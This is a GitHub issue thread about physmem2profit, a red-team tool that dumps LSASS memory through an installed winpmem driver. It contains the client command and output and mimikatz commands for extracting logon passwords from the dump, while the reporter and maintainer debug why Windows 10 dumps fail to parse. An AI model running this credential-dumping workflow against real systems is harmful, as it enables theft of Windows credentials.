### ISSUE TITLE
Windows 10 dumps

### ISSUE THREAD

**Issue by zwned** [ReversecLabs/physmem2profit#5]
I've attempted to dump against several Windows 10 systems, each time running the client several times to ensure multiple dumps (as suggested in issue #3). Additionally I have cleared the rekall cache as suggested. Im still unable to get a minidump from Windows 10 that I can successfully read in mimikatz. Any suggestions?

Compiled the server portion on Microsoft Windows [Version 10.0.18363.752] Visual Studio Community 2019 version 16.3.9. 

Ran on Microsoft Windows [Version 10.0.17763.1098] with:

```
Physmem2profit.exe --ip 1.2.3.4
```

Client running on Kali - Run with:

```
python3 physmem2profit --host 1.2.3.4 --port 8080 --mode all --driver winpmem --install att_winpmem_64.sys --label balls
[*] Connecting to 1.2.3.4 on port 8080
[*] Connected
[*] Loading config from config.json
[*] Driver installed
[*] Wrote config to config.json
[*] Exposing the physical memory as a file
[*] Analyzing physical memory
[*] Finding LSASS process
[*] LSASS found
[*] Checking for Credential Guard...
[*] No Credential Guard detected
[*] Collecting data for minidump: system info
[*] Collecting data for minidump: module info
[*] Collecting data for minidump: memory info and content
[*] Generating the minidump file
[*] Wrote LSASS minidump to output/balls-2020-04-08-lsass.dmp
```

Attempting to grab the credentials with mimikatz:

```
  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::minidump balls-2020-04-08-lsass.dmp
Switch to MINIDUMP : 'balls-2020-04-08-lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'balls-2020-04-08-lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
```

Cheers

**Comment by timhir** [comment]
Hi zwned,

I'm sorry to hear you've had problems with physmem2profit :/. Thank you for the detailed bug report!

1. How much RAM does your target system have? If you are testing with virtual machines I recommend having at least 4GB of RAM for the VM to minimize the odds of some relevant swapped out out physical memory. Most of my testing has been done with VMs with 8GB of RAM.
1. Have you tested dumping LSASS from those same systems with Task Manager, procdump, etc? Is Mimikatz able to handle those minidumps correctly?
1. Can you test with commit 659f5be? The dump method was changed quite radically in the latest release and I'd like to make sure it didn't break anything...
1. If none of the above help, would it be possible for you to share a problematic minidump from physmem2profit, a working minidump from Procdump, and a full dump of the physical memory from the same system? I can email the details if this is something you're willing to do.

Thank you again for reporting this issue! I sincerely hope I'm able to find a fix for it :).

**Comment by zwned** [comment]
Thanks for the quick response!

1. Physical laptop with 12 GB of RAM and no Credential Guard
1. Yes. I tested with Task Manager and the same version of mimikatz listed above was able to read it
1. 659f5be72f1c588b86c696fc19e5c9131b3a804b worked without issue

Thanks for the assist! Ill start digging around in the commit and see if I can isolate a bit more whats happening on my end.

**Comment by timhir** [comment]
If you can share a dump created with the latest version and another created with 659f5be I’m happy to take a closer look. There are a few things that may go wrong with latest version: incomplete list of addresses to read, failing to read the data, failing to correctly “pad” missing data in the minidump, etc. Comparing those dumps (generated right after each other) should help pinpoint the issue :).

**Comment by zwned** [comment]
Shared. Let me know if you don't get the link or cannot access the file

**Comment by timhir** [comment]
I don't have a Dropbox account so I wasn't able to download the minidumps. Can you share the files again using https://send.firefox.com/ for example? Sorry for the inconvenience. I will analyze the dumps next week.

**Comment by zwned** [comment]
No worries at all. I just uploaded to send and shared the link over email. Cheers again for the assistance!

**Comment by timhir** [comment]
I got the files now. Thank you :). The preliminary results are very curious: some relevant data is clearly missing from the minidump. For some reason those pages were not reported by `get_address_ranges` so physmem2profit did not even attempt to read those. I'll need to study the Rekall source to understand why memdump behaves differently from vaddump. I'll also try to reproduce the issue on my test machines.

If it's possible for you to send me a full memory dump created with dumpit or winpmem, that would help a lot :).

**Comment by timhir** [comment]
I pushed a new version. Could you kindly test with that, please :)?

**Comment by zwned** [comment]
Latest commit worked perfectly. Cheers!
